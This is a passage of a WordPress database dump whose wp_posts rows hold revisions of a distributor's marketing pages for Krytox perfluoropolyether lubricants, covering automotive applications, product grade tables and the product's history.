href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">Krytox™ GPL 204</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">Krytox™ GPL 214</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">Krytox™ XP2A4</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2045/">Krytox™ AUT 2045</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a></td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2a45/">Krytox™ AUT 2A45</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">Krytox™ GPL 215</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">Krytox™ XP2A5</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n<h4><strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong></h4>\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n<h4><strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong></h4>\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n<h4><strong>The following Krytox lubricants are great automotive lubricants:</strong></h4>\r\n[ux_product_categories ids="96,98,97,37,168" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\r\n\r\n&nbsp;', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-12 12:55:35', '2016-10-12 12:55:35', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2523, 2, '2016-10-12 12:56:25', '2016-10-12 12:56:25', '<h1><strong>Krytox™ Performance Lubricants | Automotive Lubricants specifically designed for Automotive needs</strong></h1>\r\nPowered by Chemours Science… Over the last fifty years, Krytox™ automotive lubricants have helped customers outpace the competition by bringing customized and innovative solutions into an increasingly competitive automotive industry.\r\n\r\nWhatever your engineering challenge—longer part life, extreme temperatures, reduced failures—Krytox™ performance lubricants can help. At Chemours, we put our science to work to produce lubricants that can stand up under the extremely demanding conditions of today’s engineering design standards.\r\n<h4><strong>Advanced Solutions for the Automotive Industry | Automotive Lubricants</strong></h4>\r\nKrytox™ performance lubricants offer a wide range of high quality, high performance lubricants to address the most challenging and complex requirements of original equipment manufacturers (OEMs) and world-class Tier One suppliers.\r\n\r\nOur family of oils, greases, and coatings will provide long-term operational excellence and high performance lubrication in extreme operating conditions.\r\n\r\nAutomotive design engineers have learned that specifying Krytox™ lubricants during the design phase can provide OEMs with significant cost savings. By lengthening the life of critical components and improving consumer satisfaction, Krytox™ lubricants help reduce repair costs and potentially save millions in warranty claims.\r\n<h4><strong>Longer Lasting Lubrication</strong></h4>\r\nAutomakers are striving for extended warranties, expecting longer intervals between vehicle service visits and very limited relubrication operations. Krytox™ lubricants have provided state-of-the art performance for mechanical systems, such as gearboxes, bearings, chains, seals, actuators, valves, and other components. Krytox™ lubricants don’t oxidize; they provide excellent lubricity and a high viscosity index through a broad range of viscosity grades. Most applications where Krytox™ lubricants are specified are considered by OEMs to be lubricated for the expected lifetime of the vehicle.\r\n<h4><strong>The Right Choice for Your Design Challenge</strong></h4>\r\nKrytox™ oils and greases are based on perfluoropolyether (PFPE) oils, with a full range of viscosities available. These synthetic fluorinated lubricants are effective from -75 °C to greater than 400 °C (-103 to &gt;752 °F), depending upon operating conditions and product grade.\r\n<h4><strong>Krytox™ performance lubricants have properties that reduce impact on the environment:</strong></h4>\r\n<ul>\r\n 	<li>Krytox™ products are fully synthetic—not petroleum-based—and totally inert, so Krytox™ oils and greases do not react with anything in the environment. Unlike other automotive lubricants, at temperatures under 350 ºC (662 °F), Krytox™ oil does not oxidize or break down into other substances that could be harmful.</li>\r\n 	<li>Krytox™ lubricants do not contain any volatile organic compounds (VOCs), according to the U.S. EPA definition. Our full fluorinated automotive lubricants are made of fluorine, oxygen, and carbon only.</li>\r\n 	<li>Krytox™ products have a very long service life. This means that products do not have to be replaced and disposed of frequently, which reduces waste.</li>\r\n 	<li>Because the Krytox™ molecule stays intact, the oils can be recycled if they become contaminated. The recycled products can then be returned to the customer for reuse.</li>\r\n 	<li>Krytox™ oils and greases are not considered hazardous wastes as manufactured under the U.S. EPA Resource and Recovery Conservation Act guidelines. However, treatment, storage, transportation, recycling, and disposal of these products must be in accordance with applicable federal, state/provincial, and local regulations.</li>\r\n</ul>\r\n<h4><strong>The Right Choice for Our Environment</strong></h4>\r\nProtection of the environment and people is a core value of Chemours. Our sustainability goals go beyond traditional footprint reduction to include goals that tie our business growth to the development of safer and environmentally improved new products and sustainable solutions.\r\n\r\nKrytox™ lubricants provide longer lasting lubrication, which lowers the frequency of relubrication; therefore, reducing the use of materials and reducing waste—important steps in helping to reduce product impact on the environment.\r\n<h4><strong>Effective Over a Wide Temperature Range</strong></h4>\r\nKrytox™ greases typically last 5-50 times longer than standard greases. One common bearing test that demonstrates the extreme performance of various grades of Krytox™ grease is the ASTM D-3336 test method, where heating/cooling test cycles are continued until failure or the completion of a specified number of hours of running time.\r\n\r\nTest results have shown that Krytox™ greases can continue to perform beyond thousands of hours and at temperatures beyond the range specified for most applications—even outlasting the tester itself.\r\n\r\nFigure 1 Ball Bearing Grease Performance Test with Krytox™ Greases\r\n<table width="1074">\r\n<tbody>\r\n<tr>\r\n<td width="250"><strong>Grade</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Recommended Temperature Range</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Viscosity 40°C/100°C</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Test Temperature</strong></td>\r\n<td style="text-align: center;" width="206"><strong>Life, hr</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n<td style="text-align: center;">60/9</td>\r\n<td style="text-align: center;">180 °C (356 °F)</td>\r\n<td style="text-align: center;">4,900+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n<td style="text-align: center;">100/12.3</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,500+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td style="text-align: center;">-36–204 °C (-33–399 °F)</td>\r\n<td style="text-align: center;">160/18</td>\r\n<td style="text-align: center;">200 °C (392 °F)</td>\r\n<td style="text-align: center;">5,000+</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xht-ac/">Krytox™ XHT AC</a></td>\r\n<td style="text-align: center;">-20–300 °C (-4–572 °F)</td>\r\n<td style="text-align: center;">500/47</td>\r\n<td style="text-align: center;">250 °C (482 °F)</td>\r\n<td style="text-align: center;">2,000+</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h4><strong>Compatibility with Elastomers and Plastics</strong></h4>\r\nKrytox™ performance lubricants are compatible with the following common elastomers and plastics, as well as many more:\r\n<ul>\r\n 	<li>Fluorosilicone</li>\r\n 	<li>Hytrel® Polyester Elastomer</li>\r\n 	<li>Delrin® Acetal</li>\r\n 	<li>Ethylacrylate</li>\r\n 	<li>Methyl Silicone</li>\r\n 	<li>Butyl 325</li>\r\n 	<li>Neoprene WRT</li>\r\n 	<li>Kalrez® Fluoroelastomer*</li>\r\n 	<li>Zytel® Nylon</li>\r\n 	<li>Viton™ A Fluoroelastomer</li>\r\n 	<li>Nycar 100 (Buna N)</li>\r\n 	<li>Vespel®</li>\r\n 	<li>Urethane</li>\r\n 	<li>Hypalon® Synthetic Rubber</li>\r\n 	<li>EPT Peroxide Cure</li>\r\n 	<li>Hydrocarbon Rubber</li>\r\n 	<li>Teflon™ Fluoropolymer</li>\r\n</ul>\r\n<h4><strong>Compatibility with Metals</strong></h4>\r\nBecause of their low surface tensions, Krytox™ oils and greases easily lubricate metallic surfaces. Krytox™ lubricants are chemically inert and, therefore, have no adverse effect on metals when the temperature is below 288 °C (550 ºF).\r\n\r\nAbove this point, Krytox™ lubricants will be the best-in-class choice for many alloy steels, stainless steels, titanium alloy, nickel alloy, and cobalt alloy.\r\n<h4><strong>Robust Electrical Properties</strong></h4>\r\nKrytox™ oils are good insulators due to fundamental properties. Our synthetic fluorinated automotive lubricants are chemically inert, insoluble in most common solvents, and nonflammable.\r\n<h4><strong>Advanced Rust and Corrosion Protection from Environmental Challenges</strong></h4>\r\nKrytox™ lubricants are not sensitive to aggressive weather conditions, such as rain, snow, ice, dust, or grit, and they are extremely resistant to the harsh underhood chemical environment of fuel, coolant, brake fluid, engine oil, and washer solvent.\r\n<h4><strong>Cost-Effective</strong></h4>\r\nKrytox™ lubricants provide OEMs with significant cost savings when specified for use during the design phase. By lengthening the life of critical components, Krytox™ automotive lubricants reduce repair costs and potentially save millions in warranty claims.\r\n\r\nFigure 2 Krytox™ Performance Lubricants Product Range\r\n<table width="868">\r\n<tbody>\r\n<tr>\r\n<td width="250">Typical Automotive Lubricants Grade</td>\r\n<td style="text-align: center;" width="206">Description</td>\r\n<td style="text-align: center;" width="206">Base Oil Viscosity, cSt</td>\r\n<td style="text-align: center;" width="206">Useful Temperature Range</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-104/">Krytox™ GPL 104</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-105/">Krytox™ GPL 105</a></td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ AUT 1045</td>\r\n<td>Clear, colorless oil</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-204/">Krytox™ GPL 204</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-214/">Krytox™ GPL 214</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-224/">Krytox™ GPL 224</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 294</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a4/">Krytox™ XP2A4</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">60</td>\r\n<td style="text-align: center;">-51–179 °C (-60–354 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2045/">Krytox™ AUT 2045</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2245/">Krytox™ AUT 2245</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2e45/">Krytox™ AUT 2E45</a></td>\r\n<td>Grease with sodium nitrite-free anti-corrosion additive</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-aut-2a45/">Krytox™ AUT 2A45</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">100</td>\r\n<td style="text-align: center;">-40–200 °C (-40–392 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-205/">Krytox™ GPL 205</a></td>\r\n<td>White, buttery additive-free grease</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-215/">Krytox™ GPL 215</a></td>\r\n<td>Grease with extreme pressure additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-225/">Krytox™ GPL 225</a></td>\r\n<td>White, buttery grease with sodium nitrite anti-corrosion additive</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ GPL 295</td>\r\n<td>Grease with extreme pressure and anti-corrosion additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-xp-2a5/">Krytox™ XP2A5</a></td>\r\n<td>Grease with soluble additive corrosion inhibitor</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n<tr>\r\n<td>Krytox™ XP2C5</td>\r\n<td>Grease with anti-corrosion and anti-fretting additives</td>\r\n<td style="text-align: center;">160</td>\r\n<td style="text-align: center;">-36–210 °C (-33–410 °F)</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nFigure 3 Krytox™ Performance Lubricants for Noise, Vibration, and Harshness (NVH) Eliminationless efficiently. When this occurs, the engine can overheat,\r\n\r\n<img class="alignnone size-medium wp-image-2391" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/Automotive-Grease-800x411.jpg" alt="Automotive Grease" width="800" height="411" />\r\n<h4><strong>Krytox™ Performance Lubricants for Noise, Vibration, and Harshness</strong></h4>\r\nWithin an automobile’s interior, there are several places where different materials contact each other. Some examples include metal on plastic, leather on leather, and weather-stripping. Movement between these surfaces often results in a series of noise described as squeak, itch, or judder. Krytox™ lubricants can permanently eliminate these noises. They are easy to apply, have low volatility, and can remain in place over the vehicle’s entire lifetime. Furthermore, Krytox™ oils and greases are compatible with a wide variety of materials, and have the frictional and long-life characteristics that make them ideal automotive lubricants in these applications.\r\n<h4><strong>Krytox™ Performance Lubricants for Automotive Lubricants Underhood Applications</strong></h4>\r\nFan Clutch\r\n\r\nA thermostatically controlled fan clutch typically drives the cooling fan. The bearings that support the drive shaft for this clutch regularly experience high temperatures. If these bearings wear and begin to fail, the cooling fan runs less efficiently. When this occurs, the engine can overheat, and any resistance in fan clutch rotation can drain valuable power from the engine’s drive shaft, further reducing overall performance. Krytox™ lubricants have low volatility and a high viscosity index, providing long-life and excellent lubrication to the fan clutch bearing under these high temperature conditions.\r\n\r\nO-Ring Lubrication/Assembly Lube\r\n\r\nO-rings effectively seal many interfaces in an automobile. A lubricant is often applied to keep seals in place during assembly and allow them to assemble without damage. Choice of lubricant is critical: if the wrong lubricant is used for a given seal material, the seal could degrade, prematurely causing serious damage. Krytox™ lubricants are the preferred choice because they are compatible with all seal materials. Furthermore, Krytox™ lubricants do not contribute to seal degradation, because they do not oxidize, and they have greater temperature stability than the seals.\r\n\r\nAlternator\r\n\r\nThe alternator is usually belt-driven by the engine and supplies electricity to basic automobile functions (headlights, radio, etc.) while recharging the car battery. As the electricity is being generated, the alternators, and hence the bearings, get very hot. Standard lubricants volatilize in the extreme high temperature environment of the alternator, leading to alternator bearing failure.\r\n\r\nAs the bearings wear and begin to fail, they can increase the alternator’s resistance to rotation.\r\n\r\nThis reduces the alternator’s performance and robs performance from the rest of the automobile.\r\n\r\nPerhaps more critically, if the alternator bearings fail, the alternator will fail and the vehicle will stop running. The higher output alternators used in today’s vehicles generate a tremendous amount of heat, demanding the advanced, reliable performance and heat stability of Krytox™ lubricants.\r\n\r\nEGR Valve\r\n\r\nThe exhaust gas re-circulating (EGR) valve reduces nitrogen oxide (NOx) emissions formation by re-circulating some of the exhausted gas back into the engine cylinders. This lowers the peak temperatures inside the cylinder; thus, reducing the rate of NOx formation. If the valve does not open enough, insufficient re-circulation takes place and excess pollution is created. If, however, the valve sticks open, the temperature inside the cylinder can drop too much, decreasing engine performance and fuel mileage. Krytox™ lubricants are an ideal choice, as they withstand the high temperatures and exhaust fumes experienced by the EGR valve.\r\n\r\nFigure 4 Krytox™ Performance Lubricants for Automotive Underhood Applications\r\n\r\n<img class="alignnone size-medium wp-image-2397" src="https://www.miller-stephenson.com/wp-content/uploads/2016/10/automotive-lubricants-800x411.jpg" alt="automotive-lubricants" width="800" height="411" />\r\n\r\nSpark Plug Boots\r\n\r\nThe spark plug boot protects the spark plug from weather and prevents the unintentional grounding of the spark energy.\r\n\r\nThe boot is made of a silicone rubber, which, over time, can bond with the silicon ceramic of the spark plug, fusing the boot and the spark plug together. Once this occurs, the only way to remove the boot is by force, which can cause enough damage to require replacement of the entire assembly. Krytox™ automotive lubricants can prevent this fusion from taking place. Krytox™ automotive lubricants are ideal in this application because they are stable, non-reactive, and long-lasting. They can also withstand the high temperatures and energies of the spark plug environment.\r\n<h4><strong>The following Krytox lubricants are great automotive lubricants:</strong></h4>\r\n[ux_product_categories ids="96,98,97,37,168" number="10"]\r\n\r\n<a href="https://www.miller-stephenson.com/krytox-automotive/">To learn more about non-bearing applications please click here.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">To learn more about Krytox GPL greases and oils, please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aut-series/">To learn more about Krytox AUT greases please click here. </a>\r\n\r\n<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">To learn more about Krytox XP bearing greases please click here.</a>\r\n\r\n&nbsp;', 'Krytox Solutions for the Automotive Industry', '', 'inherit', 'closed', 'closed', '', '2390-revision-v1', '', '', '2016-10-12 12:56:25', '2016-10-12 12:56:25', '', 2390, 'https://www.miller-stephenson.com/2390-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2524, 2, '2016-10-12 12:58:20', '2016-10-12 12:58:20', '<h3>Krytox Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a 